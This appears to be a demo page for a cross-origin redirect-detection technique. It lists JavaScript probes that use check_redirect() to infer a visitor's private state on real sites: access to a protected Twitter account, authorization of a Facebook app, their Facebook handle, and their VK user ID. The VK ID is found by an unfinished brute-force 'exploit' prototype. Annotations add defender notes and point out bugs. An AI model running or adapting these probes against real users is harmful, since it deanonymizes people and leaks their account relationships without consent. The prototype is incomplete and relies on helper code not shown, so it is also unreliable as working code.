URL and redirection detection
Blogpost with description
Run
Log ("yes" is a definite yes; "no" means most likely no, but it can be wrong when the network is slow, so double-check!)
Other examples (copy the code into the textarea and press Run, or simply use Firebug / the web inspector):
// Example: reports whether the visitor's session appears to have access to a
// protected Twitter account. check_redirect() and debug() are defined elsewhere
// on the page (not shown in this listing); `guess` is the truthy/falsy verdict
// that check_redirect passes to the callback. PROTECTED is presumably a
// placeholder for an account name.
// Defender note: a probe like this only works when a cross-origin response
// (redirect vs. no redirect) differs with the visitor's login or authorization
// state. Reviewing such state-dependent redirects, and restricting cross-origin
// window/frame access (Cross-Origin-Opener-Policy, CSP frame-ancestors,
// SameSite cookies), are the usual mitigations. Which of these applies depends
// on how check_redirect loads the URL, which is not visible here.
check_redirect('https://twitter.com/PROTECTED/favorites', function (guess) {
  var verdict = guess ? 'yes' : 'no';
  debug('Has access to protected account: ' + verdict);
});
// Example: reports whether the visitor has authorized a given Facebook app.
// check_redirect() and debug() are defined elsewhere on the page (not shown).
// NOTE: `tryapp` is assigned without `var`, so it becomes an implicit global;
// the callback reads it again when it logs. The prompt() answer is concatenated
// into the query string without URL-encoding.
// The labels are inverted relative to the other examples on this page: a truthy
// guess is logged as 'no' and a falsy one as 'yes'.
check_redirect(
  'https://www.facebook.com/dialog/oauth?client_id=' +
    (tryapp = prompt('choose app, e.g. 114545895322903')) +
    '&redirect_uri=https%3A%2F%2Fm.facebook.com',
  function (guess) {
    var authorized = guess ? 'no' : 'yes';
    debug('Authorized app ' + tryapp + ' ' + authorized);
  }
);
// facebook handle detection
// `friends` is the list of candidate handles to compare against.
var friends = ['john', 'eric', 'egor.homakov', 'alice'];

// check_redirect() and debug() are defined elsewhere on the page (not shown).
// The third argument receives `w` (presumably the window handle that
// check_redirect opened; confirm against its definition) and assigns each
// candidate profile URL, with a trailing '#', to w.location in turn.
// The result callback only reports a single yes/no for the whole list.
// Defender note: the probe relies on /profile.php behaving differently per
// logged-in user; limiting such user-specific cross-origin redirects and
// restricting cross-origin window/frame access reduce this kind of leak.
check_redirect(
  'https://www.facebook.com/profile.php',
  function (guess) {
    var verdict = guess ? 'yes' : 'no';
    debug('Guessed handle: ' + verdict);
  },
  function (w) {
    for (var idx = 0; idx < friends.length; idx++) {
      w.location = 'https://www.facebook.com/' + friends[idx] + '#';
    }
  }
);
// vkontakte ID detection
// Base URL handed to check_redirect for the VK example (plain http, as written).
var vk_base = 'http://m.vk.com/photos';
// Lower bound of the 100 000-wide range to test, typed in by the person running
// the demo. parseInt is called without a radix, and a non-numeric answer yields NaN.
var start = parseInt(prompt('In which 100 000 your ID is? for example 12300000'));
// Range widths, largest first; get_cb consumes this array with shift().
var steps = [100000,10000,1000,100,10,1];
/**
 * Builds the "assigner" callback that is passed as the third argument of
 * check_redirect in the VK example.
 *
 * The returned function takes `w` and, for every integer in [from, to),
 * assigns 'http://m.vk.com/photos' + id + '#' to w.location. The URL prefix is
 * hard-coded here rather than read from vk_base. A progress line is written to
 * the console whenever the current id is a multiple of 10000.
 *
 * @param {number} from - first id to assign (inclusive)
 * @param {number} to - end of the range (exclusive)
 * @returns {function(Object): void} callback that writes to w.location
 */
var get_assigner = function (from, to) {
  return function (w) {
    var id = from;
    while (id < to) {
      w.location = 'http://m.vk.com/photos' + id + '#';
      if (id % 10000 == 0) {
        console.log('bunch ' + id);
      }
      id++;
    }
  };
};
// Runs one check over the 100 000 ids starting at `start` and logs whether the
// visitor's id appears to fall inside that range. check_redirect() and debug()
// are defined elsewhere on the page (not shown in this listing).
// As the page's own log caption says, a 'no' can be wrong on a slow network.
check_redirect(
  vk_base,
  function (guess) {
    var verdict = guess ? 'yes' : 'no';
    debug('ID inside of ' + start + ' ' + verdict);
  },
  get_assigner(start, start + 100000)
);
// not finished proto of exploit
// (The author's own label: nothing in this listing shows it working end to end.)
// get_cb(start) returns a result callback for check_redirect.
//  - On a falsy guess the callback returns false and does nothing else.
//  - On a truthy guess it removes the next width from the shared `steps` array
//    and, if one was available, issues ten further check_redirect calls over
//    consecutive sub-ranges of that width beginning at `start`.
//  - When `steps` is empty it logs `start` through debug().
// check_redirect() and debug() are defined elsewhere on the page (not shown).
// Defender note: the narrowing relies on the target answering differently
// depending on the visitor's identity; removing that per-user difference in
// cross-origin redirects is the server-side mitigation.
var get_cb = function(start){
return function(guess){
// A negative answer ends this branch.
if(!guess) return false;
// `steps` is module-level state, so every callback shares and mutates it.
var step = steps.shift();
if(step){
for(var i=0;i < 10;i++){
var from = start+i*step;
var to = start+(i+1)*step;
console.log('start from '+from);
(check_redirect(vk_base, get_cb(from,to), get_assigner(from,to)));
}
}else{
debug('vk id found: '+ start);
}
};
}
// Starts the unfinished prototype by calling the callback directly with a
// truthy guess. `your_mln` is not defined anywhere in this listing. It is
// presumably a placeholder for a starting number supplied by the reader;
// unless it is defined elsewhere, this line raises a ReferenceError.
get_cb(your_mln)(true)